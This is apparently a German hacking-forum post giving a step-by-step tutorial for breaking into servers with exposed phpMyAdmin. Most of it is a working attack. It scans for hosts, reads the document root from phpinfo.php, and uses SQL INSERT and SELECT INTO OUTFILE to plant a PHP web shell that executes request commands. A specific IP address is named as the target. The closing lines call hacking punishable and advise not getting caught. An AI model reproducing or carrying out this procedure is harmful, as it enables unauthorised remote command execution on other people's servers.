Tool,die ihr braucht
Browser
Shell
Scannz
Also, zuerst scannt ihr.Tut gepostet
Die Results sehen dann z.B. so aus:
129.120.43.132 HTTP Request FOUND (200 OK)
Wenn ihr einen solchen scan habt geht ihr auf:
http:\\129.120.43.132\phpmyadmin\phpinfo.php
Dort guckt ihr erstmal ob das System Windows NT hat.
Danach guckt ihr unter _SERVER["DOCUMENT_ROOT"] und
Kopiert dort den Pfad der dort steht.
Das Document_Root tragt ihr dann in die Shell hier ein:
code:
INSERT INTO shell (text) values ('<? $cmd = $_REQUEST["-cmd"];
?><html><head><title>SH3LL</title></head><body bgcolor=#000000 text=#FFFFFF"
onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST> <input type=TEXT
name="-cmd" size=64 value="<?$cmd?>" tyle="background:#000000;color:#FFFFFF;"><pre><?
if ($cmd != ""; ) print Shell_Exec($cmd); ?></pre></form></body></html>'); SELECT * INTO OUTFILE 'HIERDASDOCUMENTROOT\shell.php' from shell;
FLUSH LOGS
Dann geht ihr auf:
http:\\129.120.43.132\phpmyadmin\index.php
Ihr klickt dann auf Datenbanken (Befindet sich links bei der Index.php)
Ihr wechselt dann auf die Datenbank Mysql und tragt da folgenden Sql befehl ein:
CREATE TABLE shell (text text);
Ihr habt dann eine Table erstellt die shell heißt.
Dann wechselt ihr in die Table und fügt dann als Sql befehl die oben geschriebene
Shell ein.
Wenn der Befehl erfolgreich war geht auf:
http:\\129.120.43.132\shell.php
Dort befindet sich eine cmd zeile.
Dann könnt ihr den Server ganz normal hacken wie bei MSSQL
+++++++++++++++++++++++++++++++++++++++++++
Hacken ist gefährlich und man sollte es nur mit bedacht tun !
Hacken ist strafbar und man sollte sich nicht erwischen lassen !
Hacken ist nichts für kleine Script-Kiddies die keinen Plan haben!
++++++++++++++++++++++++++++++++++++++++++++++++
Zitieren
